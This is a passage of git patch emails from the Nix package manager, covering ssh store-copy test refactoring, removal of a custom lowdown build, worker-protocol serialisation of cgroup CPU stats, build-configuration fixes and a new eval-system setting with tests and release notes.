${remoteRoot}${outPath}/foobar ] + +# Copy back from store + +clearStore + +[ ! -f $outPath/foobar ] +nix copy --no-check-sigs --from "$remoteStore" $outPath +[ -f $outPath/foobar ] + +# Check --substitute-on-destination, avoid corrupted store + +clearRemoteStore + +corruptedRoot=$TEST_ROOT/stores/corrupted +corruptedStore="${corruptedRoot}?${storeQueryParam}&$(realQueryParam "$corruptedRoot")" + +# Copy it to the corrupted store +nix copy --no-check-sigs "$outPath" --to "$corruptedStore" + +# Corrupt it in there +corruptPath="${corruptedRoot}${outPath}" +chmod +w "$corruptPath" +echo "not supposed to be here" > "$corruptPath/foobarbaz" +chmod -w "$corruptPath" + +# Copy from the corrupted store with the regular store as a +# substituter. It must use the substituter not the source store in +# order to avoid errors. +NIX_CONFIG=$(echo -e "substituters = local\nrequire-sigs = false") \ + nix copy --no-check-sigs --from "$corruptedStore" --to "$remoteStore" --substitute-on-destination "$outPath" diff --git a/tests/functional/nix-copy-ssh-ng.sh b/tests/functional/nix-copy-ssh-ng.sh index 463b5e0c4..62e99cd24 100644 --- a/tests/functional/nix-copy-ssh-ng.sh +++ b/tests/functional/nix-copy-ssh-ng.sh @@ -1,18 +1,14 @@ source common.sh -clearStore -clearCache +source nix-copy-ssh-common.sh "ssh-ng" -remoteRoot=$TEST_ROOT/store2 -chmod -R u+w "$remoteRoot" || true -rm -rf "$remoteRoot" +clearStore +clearRemoteStore outPath=$(nix-build --no-out-link dependencies.nix) -nix store info --store "ssh-ng://localhost?store=$NIX_STORE_DIR&remote-store=$remoteRoot%3fstore=$NIX_STORE_DIR%26real=$remoteRoot$NIX_STORE_DIR" +nix store info --store "$remoteStore" # Regression test for https://github.com/NixOS/nix/issues/6253 -nix copy --to "ssh-ng://localhost?store=$NIX_STORE_DIR&remote-store=$remoteRoot%3fstore=$NIX_STORE_DIR%26real=$remoteRoot$NIX_STORE_DIR" $outPath --no-check-sigs & -nix copy --to "ssh-ng://localhost?store=$NIX_STORE_DIR&remote-store=$remoteRoot%3fstore=$NIX_STORE_DIR%26real=$remoteRoot$NIX_STORE_DIR" $outPath --no-check-sigs - -[ -f $remoteRoot$outPath/foobar ] +nix copy --to "$remoteStore" $outPath --no-check-sigs & +nix copy --to "$remoteStore" $outPath --no-check-sigs diff --git a/tests/functional/nix-copy-ssh.sh b/tests/functional/nix-copy-ssh.sh index eb801548d..12e8346bc 100644 --- a/tests/functional/nix-copy-ssh.sh +++ b/tests/functional/nix-copy-ssh.sh @@ -1,20 +1,3 @@ source common.sh -clearStore -clearCache - -remoteRoot=$TEST_ROOT/store2 -chmod -R u+w "$remoteRoot" || true -rm -rf "$remoteRoot" - -outPath=$(nix-build --no-out-link dependencies.nix) - -nix copy --to "ssh://localhost?store=$NIX_STORE_DIR&remote-store=$remoteRoot%3fstore=$NIX_STORE_DIR%26real=$remoteRoot$NIX_STORE_DIR" $outPath - -[ -f $remoteRoot$outPath/foobar ] - -clearStore - -nix copy --no-check-sigs --from "ssh://localhost?store=$NIX_STORE_DIR&remote-store=$remoteRoot%3fstore=$NIX_STORE_DIR%26real=$remoteRoot$NIX_STORE_DIR" $outPath - -[ -f $outPath/foobar ] +source nix-copy-ssh-common.sh "ssh" From 19573f1b05b7d3ccfd07c9c351396494d488ab2d Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 13 Dec 2023 15:33:15 -0500 Subject: [PATCH 113/654] Restore comment --- scripts/binary-tarball.nix | 1 + 1 file changed, 1 insertion(+) diff --git a/scripts/binary-tarball.nix b/scripts/binary-tarball.nix index 32e811c94..104189b0c 100644 --- a/scripts/binary-tarball.nix +++ b/scripts/binary-tarball.nix @@ -14,6 +14,7 @@ let inherit (nix) version; env = { + #nativeBuildInputs = lib.optional (system != "aarch64-linux") shellcheck; meta.description = "Distribution-independent Nix bootstrap binaries for ${system}"; }; From f10f0f1b50228e09ad587a7c550df586061e4514 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 13 Dec 2023 20:41:20 +0000 Subject: [PATCH 114/654] Move `lowdown.nix` to `misc/` --- flake.nix | 2 +- lowdown.nix => misc/lowdown.nix | 0 2 files changed, 1 insertion(+), 1 deletion(-) rename lowdown.nix => misc/lowdown.nix (100%) diff --git a/flake.nix b/flake.nix index 0cdd2b41f..c7ff7eb64 100644 --- a/flake.nix +++ b/flake.nix @@ -167,7 +167,7 @@ ''; }; - lowdown-nix = final.callPackage ./lowdown.nix { + lowdown-nix = final.callPackage ./misc/lowdown.nix { inherit lowdown-src stdenv; }; diff --git a/lowdown.nix b/misc/lowdown.nix similarity index 100% rename from lowdown.nix rename to misc/lowdown.nix From bf5804d46a0d0aa5eb40107b6eaeec4e95bbd4a2 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 13 Dec 2023 20:41:41 +0000 Subject: [PATCH 115/654] flake.nix: Delete uneeded `attrs0` binding --- package.nix | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/package.nix b/package.nix index 7c1ba3130..8fc4be328 100644 --- a/package.nix +++ b/package.nix @@ -92,7 +92,7 @@ , __forDefaults ? { canRunInstalled = doBuild && stdenv.buildPlatform.canExecute stdenv.hostPlatform; } -} @ attrs0: +}: let version = lib.fileContents ./.version + versionSuffix; From 28f2f3136d19ef7de4c6acd9678aef72e80d4fb8 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 13 Dec 2023 20:47:36 +0000 Subject: [PATCH 116/654] Delete stray `install_name_tool` call --- package.nix | 1 - 1 file changed, 1 deletion(-) diff --git a/package.nix b/package.nix index 8fc4be328..0b5b512c7 100644 --- a/package.nix +++ b/package.nix @@ -320,7 +320,6 @@ in { -change ${boost}/lib/libboost_context.dylib \ $out/lib/libboost_context.dylib \ $out/lib/libnixutil.dylib - install_name_tool '' ) + lib.optionalString enableInternalAPIDocs '' mkdir -p ''${!outputDoc}/nix-support From 2d24875fe4aa7f31d15acfc29b9aa5c45109f99d Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 13 Dec 2023 20:49:31 +0000 Subject: [PATCH 117/654] package.nix: Avoid `${..}` for conditional strings Using `+` is Nixpkgs standard ideom for this, and helps avoid needless rebuilds somewhat. --- package.nix | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/package.nix b/package.nix index 0b5b512c7..0b2ff43b0 100644 --- a/package.nix +++ b/package.nix @@ -254,25 +254,25 @@ in { disallowedReferences = [ boost ]; - preConfigure = lib.optionalString (doBuild && ! stdenv.hostPlatform.isStatic) '' - # Copy libboost_context so we don't get all of Boost in our closure. - # https://github.com/NixOS/nixpkgs/issues/45462 - mkdir -p $out/lib - cp -pd ${boost}/lib/{libboost_context*,libboost_thread*,libboost_system*,libboost_regex*} $out/lib - rm -f $out/lib/*.a - ${lib.optionalString stdenv.hostPlatform.isLinux '' + preConfigure = lib.optionalString (doBuild && ! stdenv.hostPlatform.isStatic) ( + '' + # Copy libboost_context so we don't get all of Boost in our closure. + # https://github.com/NixOS/nixpkgs/issues/45462 + mkdir -p $out/lib + cp -pd ${boost}/lib/{libboost_context*,libboost_thread*,libboost_system*,libboost_regex*} $out/lib + rm -f $out/lib/*.a + '' + lib.optionalString stdenv.hostPlatform.isLinux '' chmod u+w $out/lib/*.so.* patchelf --set-rpath $out/lib:${stdenv.cc.cc.lib}/lib $out/lib/libboost_thread.so.* - ''} - ${lib.optionalString stdenv.hostPlatform.isDarwin '' + '' + lib.optionalString stdenv.hostPlatform.isDarwin '' for LIB in $out/lib/*.dylib; do chmod u+w $LIB install_name_tool -id $LIB $LIB install_name_tool -delete_rpath ${boost}/lib/ $LIB || true done install_name_tool -change ${boost}/lib/libboost_system.dylib $out/lib/libboost_system.dylib $out/lib/libboost_thread.dylib - ''} - ''; + '' + ); configureFlags = [ "--sysconfdir=/etc" From 7b29b44d8e62f686aa9fbfafe53be959cdba03cb Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 13 Dec 2023 16:22:35 -0500 Subject: [PATCH 118/654] Remove custom lowdown This was last upgraded in 788008385ef5bf7edb799977525d6f73f02c76bc, but the version in Nixpkgs is a now a lot newer. I think the custom was added to get ahead of Nixpkgs before, and so now that we are in fact behind, it is no longer needed. --- flake.lock | 17 ----------------- flake.nix | 11 +---------- misc/lowdown.nix | 22 ---------------------- 3 files changed, 1 insertion(+), 49 deletions(-) delete mode 100644 misc/lowdown.nix diff --git a/flake.lock b/flake.lock index 3cb9e72c9..db1a72c14 100644 --- a/flake.lock +++ b/flake.lock @@ -32,22 +32,6 @@ "type": "github" } }, - "lowdown-src": { - "flake": false, - "locked": { - "lastModified": 1633514407, - "narHash": "sha256-Dw32tiMjdK9t3ETl5fzGrutQTzh2rufgZV4A/BbxuD4=", - "owner": "kristapsdz", - "repo": "lowdown", - "rev": "d2c2b44ff6c27b936ec27358a2653caaef8f73b8", - "type": "github" - }, - "original": { - "owner": "kristapsdz", - "repo": "lowdown", - "type": "github" - } - }, "nixpkgs": { "locked": { "lastModified": 1701355166, @@ -84,7 +68,6 @@ "inputs": { "flake-compat": "flake-compat", "libgit2": "libgit2", - "lowdown-src": "lowdown-src", "nixpkgs": "nixpkgs", "nixpkgs-regression": "nixpkgs-regression" } diff --git a/flake.nix b/flake.nix index c7ff7eb64..eb3846564 100644 --- a/flake.nix +++ b/flake.nix @@ -13,11 +13,10 @@ # to remove the `nix.checkAllErrors = false;` line in the tests. inputs.nixpkgs.url = "github:NixOS/nixpkgs/staging-23.05"; inputs.nixpkgs-regression.url = "github:NixOS/nixpkgs/215d4d0fd80ca5163643b03a33fde804a29cc1e2"; - inputs.lowdown-src = { url = "github:kristapsdz/lowdown"; flake = false; }; inputs.flake-compat = { url = "github:edolstra/flake-compat"; flake = false; }; inputs.libgit2 = { url = "github:libgit2/libgit2"; flake = false; }; - outputs = { self, nixpkgs, nixpkgs-regression, lowdown-src, libgit2, ... }: + outputs = { self, nixpkgs, nixpkgs-regression, libgit2, ... }: let inherit (nixpkgs) lib; @@ -140,9 +139,6 @@ { nixStable = prev.nix; - # Forward from the previous stage as we don’t want it to pick the lowdown override - inherit (prev) nixUnstable; - default-busybox-sandbox-shell = final.busybox.override { useMusl = true; enableStatic = true; @@ -167,10 +163,6 @@ ''; }; - lowdown-nix = final.callPackage ./misc/lowdown.nix { - inherit lowdown-src stdenv; - }; - libgit2-nix = final.libgit2.overrideAttrs (attrs: { src = libgit2; version = libgit2.lastModifiedDate; @@ -208,7 +200,6 @@ officialRelease = false; boehmgc = final.boehmgc-nix; libgit2 = final.libgit2-nix; - lowdown = final.lowdown-nix; busybox-sandbox-shell = final.busybox-sandbox-shell or final.default-busybox-sandbox-shell; changelog-d = final.changelog-d-nix; } // { diff --git a/misc/lowdown.nix b/misc/lowdown.nix deleted file mode 100644 index 5f469fad5..000000000 --- a/misc/lowdown.nix +++ /dev/null @@ -1,22 +0,0 @@ -{ lib -, stdenv -, which -, lowdown-src -}: - -stdenv.mkDerivation rec { - name = "lowdown-0.9.0"; - - src = lowdown-src; - - outputs = [ "out" "bin" "dev" ]; - - nativeBuildInputs = [ which ]; - - configurePhase = '' - ${lib.optionalString (stdenv.isDarwin && stdenv.isAarch64) "echo \"HAVE_SANDBOX_INIT=false\" > configure.local"} - ./configure \ - PREFIX=${placeholder "dev"} \ - BINDIR=${placeholder "bin"}/bin - ''; -} From 1e3d8118401d80da54fb64641e606042c3499e4d Mon Sep 17 00:00:00 2001 From: Ramses Date: Wed, 13 Dec 2023 22:37:17 +0100 Subject: [PATCH 119/654] worker protocol: serialise cgroup stats in `BuildResult` (#9598) By doing so, they get reported when building through the daemon via either `unix://` or `ssh-ng://`. --- doc/manual/rl-next/cgroup-stats.md | 8 +++ src/libstore/worker-protocol.cc | 34 ++++++++++ src/libstore/worker-protocol.hh | 6 +- .../worker-protocol/build-result-1.37.bin | Bin 0 -> 808 bytes tests/unit/libstore/worker-protocol.cc | 61 ++++++++++++++++-- 5 files changed, 101 insertions(+), 8 deletions(-) create mode 100644 doc/manual/rl-next/cgroup-stats.md create mode 100644 tests/unit/libstore/data/worker-protocol/build-result-1.37.bin diff --git a/doc/manual/rl-next/cgroup-stats.md b/doc/manual/rl-next/cgroup-stats.md new file mode 100644 index 000000000..00853a0f8 --- /dev/null +++ b/doc/manual/rl-next/cgroup-stats.md @@ -0,0 +1,8 @@ +--- +synopsis: Include cgroup stats when building through the daemon +prs: 9598 +--- + +Nix now also reports cgroup statistics when building through the nix daemon and when doing remote builds using ssh-ng, +if both sides of the connection are this version of Nix or newer. + diff --git a/src/libstore/worker-protocol.cc b/src/libstore/worker-protocol.cc index 2a379e75e..a50259d24 100644 --- a/src/libstore/worker-protocol.cc +++ b/src/libstore/worker-protocol.cc @@ -7,6 +7,7 @@ #include "archive.hh" #include "path-info.hh" +#include #include namespace nix { @@ -47,6 +48,31 @@ void WorkerProto::Serialise>::write(const StoreDirCon } +std::optional WorkerProto::Serialise>::read(const StoreDirConfig & store, WorkerProto::ReadConn conn) +{ + auto tag = readNum(conn.from); + switch (tag) { + case 0: + return std::nullopt; + case 1: + return std::optional{std::chrono::microseconds(readNum(conn.from))}; + default: + throw Error("Invalid optional tag from remote"); + } +} + +void WorkerProto::Serialise>::write(const StoreDirConfig & store, WorkerProto::WriteConn conn, const std::optional & optDuration) +{ + if (!optDuration.has_value()) { + conn.to << uint8_t{0}; + } else { + conn.to + << uint8_t{1} + << optDuration.value().count(); + } +} + + DerivedPath WorkerProto::Serialise::read(const StoreDirConfig & store, WorkerProto::ReadConn conn) { auto s = readString(conn.from); @@ -110,6 +136,10 @@ BuildResult WorkerProto::Serialise::read(const StoreDirConfig & sto >> res.startTime >> res.stopTime; } + if (GET_PROTOCOL_MINOR(conn.version) >= 37) { + res.cpuUser = WorkerProto::Serialise>::read(store, conn); + res.cpuSystem = WorkerProto::Serialise>::read(store, conn); + } if (GET_PROTOCOL_MINOR(conn.version) >= 28) { auto builtOutputs = WorkerProto::Serialise::read(store, conn); for (auto && [output, realisation] : builtOutputs) @@ -132,6 +162,10 @@ void WorkerProto::Serialise::write(const StoreDirConfig & store, Wo << res.startTime << res.stopTime; } + if (GET_PROTOCOL_MINOR(conn.version) >= 37) { + WorkerProto::write(store, conn, res.cpuUser); + WorkerProto::write(store, conn, res.cpuSystem); + } if (GET_PROTOCOL_MINOR(conn.version) >= 28) { DrvOutputs builtOutputs; for (auto & [output, realisation] : res.builtOutputs) diff --git a/src/libstore/worker-protocol.hh b/src/libstore/worker-protocol.hh index c26914289..91d277b77 100644 --- a/src/libstore/worker-protocol.hh +++ b/src/libstore/worker-protocol.hh @@ -1,6 +1,8 @@ #pragma once ///@file +#include + #include "common-protocol.hh" namespace nix { @@ -9,7 +11,7 @@ namespace nix { #define WORKER_MAGIC_1 0x6e697863 #define WORKER_MAGIC_2 0x6478696f -#define PROTOCOL_VERSION (1 << 8 | 36) +#define PROTOCOL_VERSION (1 << 8 | 37) #define GET_PROTOCOL_MAJOR(x) ((x) & 0xff00) #define GET_PROTOCOL_MINOR(x) ((x) & 0x00ff) @@ -214,6 +216,8 @@ template<> DECLARE_WORKER_SERIALISER(UnkeyedValidPathInfo); template<> DECLARE_WORKER_SERIALISER(std::optional); +template<> +DECLARE_WORKER_SERIALISER(std::optional); template DECLARE_WORKER_SERIALISER(std::vector); diff --git a/tests/unit/libstore/data/worker-protocol/build-result-1.37.bin b/tests/unit/libstore/data/worker-protocol/build-result-1.37.bin new file mode 100644 index 0000000000000000000000000000000000000000..7d6e43fff2f593c9669897f1594ef2526293b866 GIT binary patch literal 808 zcmc(b!A=4(5QbNYCw&D7HXbqAZP|9&SMZ?mYCOy`Q??0dfh{3~@J_yn?_}3497ssi zkk~`NPG{zy$$yh{=Qh&1p+SP-rryS%zu_*nozv~b{8i*2l1Kg&hyFwTsm?J^pZ&Jx z7(XWuZG7Ec;XHLnni_a6OQ{Pv(Gvn*a8V&-GN)9gN@`4z#zM+q67p$E1#+ya@Ky@P zI?Ja*37y|pu=-Z~h`Kw5v>=OQ{VT!TG~kW14J&v15i`h2cEQPP#N67yfUkq@EZeAh nE0*W@7*-7pjhR{S>lKBa-ro0@_Cq`OPkw~Szw@JOIPv2Pj)JK^ literal 0 HcmV?d00001 diff --git a/tests/unit/libstore/worker-protocol.cc b/tests/unit/libstore/worker-protocol.cc index 91f804f0c..2b2e559a9 100644 --- a/tests/unit/libstore/worker-protocol.cc +++ b/tests/unit/libstore/worker-protocol.cc @@ -280,13 +280,60 @@ VERSIONED_CHARACTERIZATION_TEST( }, .startTime = 30, .stopTime = 50, -#if 0 - // These fields are not yet serialized. - // FIXME Include in next version of protocol or document - // why they are skipped. - .cpuUser = std::chrono::milliseconds(500s), - .cpuSystem = std::chrono::milliseconds(604s), -#endif + }, + }; + t; + })) + +VERSIONED_CHARACTERIZATION_TEST( + WorkerProtoTest, + buildResult_1_37, + "build-result-1.37", + 1 << 8 | 37, + ({ + using namespace std::literals::chrono_literals; + std::tuple t { + BuildResult { + .status = BuildResult::OutputRejected, + .errorMsg = "no idea why", + }, + BuildResult { + .status = BuildResult::NotDeterministic, + .errorMsg = "no idea why", + .timesBuilt = 3, + .isNonDeterministic = true, + .startTime = 30, + .stopTime = 50, + }, + BuildResult { + .status = BuildResult::Built, + .timesBuilt = 1, + .builtOutputs = { + { + "foo", + { + .id = DrvOutput { + .drvHash = Hash::parseSRI("sha256-b4afnqKCO9oWXgYHb9DeQ2berSwOjS27rSd9TxXDc/U="), + .outputName = "foo", + }, + .outPath = StorePath { "g1w7hy3qg1w7hy3qg1w7hy3qg1w7hy3q-foo" }, + }, + }, + { + "bar", + { + .id = DrvOutput { + .drvHash = Hash::parseSRI("sha256-b4afnqKCO9oWXgYHb9DeQ2berSwOjS27rSd9TxXDc/U="), + .outputName = "bar", + }, + .outPath = StorePath { "g1w7hy3qg1w7hy3qg1w7hy3qg1w7hy3q-bar" }, + }, + }, + }, + .startTime = 30, + .stopTime = 50, + .cpuUser = std::chrono::microseconds(500s), + .cpuSystem = std::chrono::microseconds(604s), }, }; t; From 6ed803737c587a0cc9026093c941c1d1172fa5dc Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Wed, 13 Dec 2023 14:02:52 -0800 Subject: [PATCH 120/654] Use `--with-boost` on macOS `configureFlags` only included `--with-boost` on Linux, which makes local builds as outlined in `doc/manual/src/contributing/hacking.md` fail when performed on macOS. --- package.nix | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/package.nix b/package.nix index 0b2ff43b0..24395b484 100644 --- a/package.nix +++ b/package.nix @@ -284,8 +284,9 @@ in { ] ++ lib.optionals installUnitTests [ "--with-check-bin-dir=${builtins.placeholder "check"}/bin" "--with-check-lib-dir=${builtins.placeholder "check"}/lib" - ] ++ lib.optionals (doBuild && stdenv.isLinux) [ + ] ++ lib.optionals (doBuild) [ "--with-boost=${boost}/lib" + ] ++ lib.optionals (doBuild && stdenv.isLinux) [ "--with-sandbox-shell=${busybox-sandbox-shell}/bin/busybox" ] ++ lib.optional (doBuild && stdenv.isLinux && !(stdenv.hostPlatform.isStatic && stdenv.system == "aarch64-linux")) "LDFLAGS=-fuse-ld=gold" From 06e106beff4fe9922d1e5debe7a16daec26c398d Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 14 Dec 2023 13:38:10 +0100 Subject: [PATCH 121/654] Disable GitHub tree hash mismatch warning --- src/libfetchers/github.cc | 2 ++ 1 file changed, 2 insertions(+) diff --git a/src/libfetchers/github.cc b/src/libfetchers/github.cc index d07aa3cea..0f30723cf 100644 --- a/src/libfetchers/github.cc +++ b/src/libfetchers/github.cc @@ -238,12 +238,14 @@ struct GitArchiveInputScheme : InputScheme cache->upsert(treeHashKey, Attrs{{"treeHash", tarballInfo.treeHash.gitRev()}}); cache->upsert(lastModifiedKey, Attrs{{"lastModified", (uint64_t) tarballInfo.lastModified}}); + #if 0 if (upstreamTreeHash != tarballInfo.treeHash) warn( "Git tree hash mismatch for revision '%s' of '%s': " "expected '%s', got '%s'. " "This can happen if the Git repository uses submodules.", rev->gitRev(), input.to_string(), upstreamTreeHash->gitRev(), tarballInfo.treeHash.gitRev()); + #endif return {std::move(input), tarballInfo}; } From e13fc0bbdb1e1eefeb33ff4d18310958041b1ad5 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 8 Dec 2023 19:52:08 -0500 Subject: [PATCH 122/654] Fix `sys/xattr.h` check I wrote the `configure.ac` wrong, and so we just got no builds supporting ACLs. Also, it needs to be more precise because Darwin puts other stuff in that same header, evidently. --- configure.ac | 3 ++- src/libstore/posix-fs-canonicalise.cc | 2 +- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/configure.ac b/configure.ac index f9ad3c840..a949f9df2 100644 --- a/configure.ac +++ b/configure.ac @@ -289,7 +289,8 @@ esac AC_SUBST(HAVE_SECCOMP, [$have_seccomp]) # Optional dependencies for better normalizing file system data -AC_CHECK_HEADERS[sys/xattr.h] +AC_CHECK_HEADERS([sys/xattr.h]) +AC_CHECK_FUNCS([llistxattr lremovexattr]) # Look for aws-cpp-sdk-s3. AC_LANG_PUSH(C++) diff --git a/src/libstore/posix-fs-canonicalise.cc b/src/libstore/posix-fs-canonicalise.cc index f38fa8369..5edda0157 100644 --- a/src/libstore/posix-fs-canonicalise.cc +++ b/src/libstore/posix-fs-canonicalise.cc @@ -78,7 +78,7 @@ static void canonicalisePathMetaData_( if (!(S_ISREG(st.st_mode) || S_ISDIR(st.st_mode) || S_ISLNK(st.st_mode))) throw Error("file '%1%' has an unsupported type", path); -#ifdef HAVE_SYS_XATTR_H +#if HAVE_SYS_XATTR_H && HAVE_LLISTXATTR && HAVE_LREMOVEXATTR /* Remove extended attributes / ACLs. */ ssize_t eaSize = llistxattr(path.c_str(), nullptr, 0); From 8d39c0c19638eb0cd07c1d0af89320e33f9c02d4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jos=C3=A9=20Luis=20Lafuente?= Date: Thu, 14 Dec 2023 23:14:59 +0100 Subject: [PATCH 123/654] Fix clang devshell Issue introduced in https://github.com/NixOS/nix/pull/9535 --- package.nix | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/package.nix b/package.nix index 24395b484..6ea5bf9c9 100644 --- a/package.nix +++ b/package.nix @@ -5,6 +5,7 @@ , autoreconfHook , aws-sdk-cpp , boehmgc +, buildPackages , nlohmann_json , bison , boost @@ -207,6 +208,9 @@ in { # changelog ++ lib.optional (!officialRelease && buildUnreleasedNotes) changelog-d ++ lib.optional enableInternalAPIDocs doxygen + + ++ lib.optional stdenv.cc.isClang buildPackages.bear + ++ lib.optional (stdenv.cc.isClang && stdenv.hostPlatform == stdenv.buildPlatform) buildPackages.clang-tools ; buildInputs = lib.optionals doBuild [ From bcbdb09ccf7ca007d3c2046177356fbfe7b72304 Mon Sep 17 00:00:00 2001 From: Matthew Bauer Date: Tue, 29 Sep 2020 15:33:47 -0400 Subject: [PATCH 124/654] Add eval-system option `eval-system` option overrides just the value of `builtins.currentSystem`. This is more useful than overriding `system` since you can build these derivations on remote builders which can work on the given system. Co-authored-by: John Ericson Co-authored-by: Valentin Gagarin --- src/libexpr/eval-settings.cc | 6 ++++++ src/libexpr/eval-settings.hh | 20 ++++++++++++++++++++ src/libexpr/primops.cc | 11 +++++++---- src/libstore/globals.hh | 6 +++++- tests/unit/libexpr/primops.cc | 3 ++- 5 files changed, 40 insertions(+), 6 deletions(-) diff --git a/src/libexpr/eval-settings.cc b/src/libexpr/eval-settings.cc index 444a7d7d6..2ccbe327f 100644 --- a/src/libexpr/eval-settings.cc +++ b/src/libexpr/eval-settings.cc @@ -89,6 +89,12 @@ std::string EvalSettings::resolvePseudoUrl(std::string_view url) return std::string(url); } +const std::string & EvalSettings::getCurrentSystem() +{ + const auto & evalSystem = currentSystem.get(); + return evalSystem != "" ? evalSystem : settings.thisSystem.get(); +} + EvalSettings evalSettings; static GlobalConfig::Register rEvalSettings(&evalSettings); diff --git a/src/libexpr/eval-settings.hh b/src/libexpr/eval-settings.hh index 3009a462c..ad187ca01 100644 --- a/src/libexpr/eval-settings.hh +++ b/src/libexpr/eval-settings.hh @@ -27,6 +27,26 @@ struct EvalSettings : Config [`builtins.nixPath`](@docroot@/language/builtin-constants.md#builtins-nixPath). )"}; + Setting currentSystem{ + this, "", "eval-system", + R"( + This option defines + [`builtins.currentSystem`](@docroot@/language/builtin-constants.md#builtins-currentSystem) + in the Nix language if it is set as a non-empty string. + Otherwise, if it is defined as the empty string (the default), the value of the + [`system` ](#conf-system) + configuration setting is used instead. + + Unlike `system`, this setting does not change what kind of derivations can be built locally. + This is useful for evaluating Nix code on one system to produce derivations to be built on another type of system. + )"}; + + /** + * Implements the `eval-system` vs `system` defaulting logic + * described for `eval-system`. + */ + const std::string & getCurrentSystem(); + Setting restrictEval{ this, false, "restrict-eval", R"( diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 89d5492da..d78a28c73 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -4383,13 +4383,16 @@ void EvalState::createBaseEnv() .impureOnly = true, }); - if (!evalSettings.pureEval) { - v.mkString(settings.thisSystem.get()); - } + if (!evalSettings.pureEval) + v.mkString(evalSettings.getCurrentSystem()); addConstant("__currentSystem", v, { .type = nString, .doc = R"( - The value of the [`system` configuration option](@docroot@/command-ref/conf-file.md#conf-system). + The value of the + [`eval-system`](@docroot@/command-ref/conf-file.md#conf-eval-system) + or else + [`system`](@docroot@/command-ref/conf-file.md#conf-system) + configuration option. It can be used to set the `system` attribute for [`builtins.derivation`](@docroot@/language/derivations.md) such that the resulting derivation can be built on the same system that evaluates the Nix expression: diff --git a/src/libstore/globals.hh b/src/libstore/globals.hh index df977e294..e28615cdc 100644 --- a/src/libstore/globals.hh +++ b/src/libstore/globals.hh @@ -214,7 +214,11 @@ public: In general, you do not have to modify this setting. While you can force Nix to run a Darwin-specific `builder` executable on a Linux machine, the result would obviously be wrong. - This value is available in the Nix language as [`builtins.currentSystem`](@docroot@/language/builtin-constants.md#builtins-currentSystem). + This value is available in the Nix language as + [`builtins.currentSystem`](@docroot@/language/builtin-constants.md#builtins-currentSystem) + if the + [`eval-system`](#conf-eval-system) + configuration option is set as the empty string. )"}; Setting maxSilentTime{ diff --git a/tests/unit/libexpr/primops.cc b/tests/unit/libexpr/primops.cc index 384d9924b..31b1b49ae 100644 --- a/tests/unit/libexpr/primops.cc +++ b/tests/unit/libexpr/primops.cc @@ -1,6 +1,7 @@ #include #include +#include "eval-settings.hh" #include "memory-input-accessor.hh" #include "tests/libexpr.hh" @@ -631,7 +632,7 @@ namespace nix { TEST_F(PrimOpTest, currentSystem) { auto v = eval("builtins.currentSystem"); - ASSERT_THAT(v, IsStringEq(settings.thisSystem.get())); + ASSERT_THAT(v, IsStringEq(evalSettings.getCurrentSystem())); } TEST_F(PrimOpTest, derivation) { From 70f50cbb2aa35f1ad1e38c9c73a5f8267baac17d Mon Sep 17 00:00:00 2001 From: John Ericson Date: Thu, 14 Dec 2023 19:47:10 -0500 Subject: [PATCH 125/654] Functional Test for `builtins.storeDir` and `builtins.currentSystem` These were under-tested. This tests the status quo and especially previous commit of this PR better. --- tests/functional/impure-eval.sh | 35 +++++++++++++++++++++++++++++++++ tests/functional/local.mk | 1 + 2 files changed, 36 insertions(+) create mode 100644 tests/functional/impure-eval.sh diff --git a/tests/functional/impure-eval.sh b/tests/functional/impure-eval.sh new file mode 100644 index 000000000..6c72f01d7 --- /dev/null +++ b/tests/functional/impure-eval.sh @@ -0,0 +1,35 @@ +source common.sh + +export REMOTE_STORE="dummy://" + +simpleTest () { + local expr=$1; shift + local result=$1; shift + # rest, extra args + + [[ "$(nix eval --impure --raw "$@" --expr "$expr")" == "$result" ]] +} + +# `builtins.storeDir` + +## Store dir follows `store` store setting +simpleTest 'builtins.storeDir' '/foo' --store "$REMOTE_STORE?store=/foo" +simpleTest 'builtins.storeDir' '/bar' --store "$REMOTE_STORE?store=/bar" + +# `builtins.currentSystem` + +## `system` alone affects by default +simpleTest 'builtins.currentSystem' 'foo' --system 'foo' +simpleTest 'builtins.currentSystem' 'bar' --system 'bar' + +## `system` affects if `eval-system` is an empty string +simpleTest 'builtins.currentSystem' 'foo' --system 'foo' --eval-system '' +simpleTest 'builtins.currentSystem' 'bar' --system 'bar' --eval-system '' + +## `eval-system` alone affects +simpleTest 'builtins.currentSystem' 'foo' --eval-system 'foo' +simpleTest 'builtins.currentSystem' 'bar' --eval-system 'bar' + +## `eval-system` overrides `system` +simpleTest 'builtins.currentSystem' 'bar' --system 'foo' --eval-system 'bar' +simpleTest 'builtins.currentSystem' 'baz' --system 'foo' --eval-system 'baz' diff --git a/tests/functional/local.mk b/tests/functional/local.mk index 10b399d75..192e275e3 100644 --- a/tests/functional/local.mk +++ b/tests/functional/local.mk @@ -71,6 +71,7 @@ nix_tests = \ build-remote-trustless-should-fail-0.sh \ build-remote-with-mounted-ssh-ng.sh \ nar-access.sh \ + impure-eval.sh \ pure-eval.sh \ eval.sh \ repl.sh \ From 228e995cde0f059e4edebdfc8f46d3389d2dc135 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Thu, 14 Dec 2023 19:53:59 -0500 Subject: [PATCH 126/654] Add release not for `eval-system` --- doc/manual/rl-next/eval-system.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 doc/manual/rl-next/eval-system.md diff --git a/doc/manual/rl-next/eval-system.md b/doc/manual/rl-next/eval-system.md new file mode 100644 index 000000000..a4696a56c --- /dev/null +++ b/doc/manual/rl-next/eval-system.md @@ -0,0 +1,12 @@ +--- +synopsis: Add new `eval-system` setting +prs: 4093 +--- + 